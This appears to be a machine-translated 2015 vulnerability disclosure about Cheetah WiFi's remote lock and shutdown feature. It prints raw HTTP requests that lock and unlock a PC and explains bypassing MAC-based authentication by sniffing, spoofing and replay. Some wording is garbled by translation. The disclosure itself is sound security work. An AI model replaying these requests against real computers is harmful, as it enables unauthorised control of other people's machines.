Cheetah wifi under a non-certified remote control PC power off, lock-screen-vulnerability warning-the black bar safety net

2015-03-15T00:00:00
ID MYHACK58:62201559951
Type myhack58
Reporter 佚名
Modified 2015-03-15T00:00:00

Description

Brief description:

In the computer open the Cheetah WiFi hotspot, a feature is a remote control computer shutdown and lock screen, found that authentication only by mac address binding, can be fake mac address to bypass authentication

Detailed description:

! 1418485757111276.jpg

wireshark packet capture as follows:

code area

POST /api/calltool? type=unlockscreen HTTP/1.1 Host: hi. liebao. cn:8 7 3 5 Connection: keep-alive Content-Length: 0 Origin: http://hi.liebao.cn:8735 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11D257 UCBrowser/10.1.0.518 Mobile Accept: application/json Accept-Language: zh-cn Referer: http://hi.liebao.cn:8735/tool/ Accept-Encoding: gzip,deflate

HTTP/1.1 2 0 0 OK Transfer-Encoding: chunked

C {"code":"1"} 0

POST /api/calltool? type=lockscreen HTTP/1.1 Host: hi. liebao. cn:8 7 3 5 Connection: keep-alive Content-Length: 0 Origin: http://hi.liebao.cn:8735 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11D257 UCBrowser/10.1.0.518 Mobile Accept: application/json Accept-Language: zh-cn Referer: http://hi.liebao.cn:8735/tool/ Accept-Encoding: gzip,deflate

HTTP/1.1 2 0 0 OK Transfer-Encoding: chunked

C {"code":"1"} 0

Visible no encryption, no authentication.

But the device is the first use of the command will bind the phone's mac address

By sniffing LEGALLY BINDING phone sends a command packet and mac address, and then attack the fake the same mac address and command to the package, you can bypass the authentication, the control computer. But the premise is that has access to the WiFi.

Vulnerability proof:

[1] [2] next